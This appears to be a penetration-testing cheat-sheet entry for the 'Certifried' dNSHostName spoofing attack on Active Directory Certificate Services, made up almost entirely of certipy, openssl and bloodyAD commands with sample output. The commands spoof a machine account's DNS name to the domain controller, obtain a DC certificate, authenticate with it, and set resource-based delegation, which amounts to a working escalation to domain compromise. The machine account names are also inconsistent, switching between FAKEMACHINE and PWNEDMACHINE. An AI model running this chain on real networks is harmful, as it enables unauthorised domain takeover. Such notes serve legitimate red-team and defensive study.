dNSHostName Spoofing (Certifried)

$ certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -target CA01.megacorp.local -ca CorpCA -template User -dc-ip 192.168.1.11
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 120
[*] Got certificate with UPN 'snovvcrash@megacorp.local'
[*] Certificate object SID is 'S-1-5-21-1230029644-1443616230-1161330039-2139'  <== NOT vulnerable
[*] Saved certificate and private key to 'snovvcrash.pfx'

$ certipy account create -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user FAKEMACHINE -dns DC01.megacorp.local

$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -spns ''
$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -dns DC01.megacorp.local

$ certipy req -u 'FAKEMACHINE$@megacorp.local' -p 'M4chinePassw0rd!' -target CA01.megacorp.local -ca CorpCA -template Machine -dc-ip 192.168.1.11

$ certipy auth -pfx dc01.pfx -dc-ip 192.168.1.11

$ openssl pkcs12 -in dc01.pfx -out dc01.pem -nodes
$ python bloodyAD.py -d megacorp.local -c ":dc01.pem" --host 192.168.1.11 setRbcd 'FAKEMACHINE$' 'DC01$'

$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -dns PWNEDMACHINE.megacorp.local
$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -spns WSMAN/pwnedmachine.MEGACORP.LOCAL,WSMAN/pwnedmachine,TERMSRV/pwnedmachine.MEGACORP.LOCAL,TERMSRV/pwnedmachine,RestrictedKrbHost/pwnedmachine,HOST/pwnedmachine,RestrictedKrbHost/pwnedmachine.MEGACORP.LOCAL,HOST/pwnedmachine.MEGACORP.LOCAL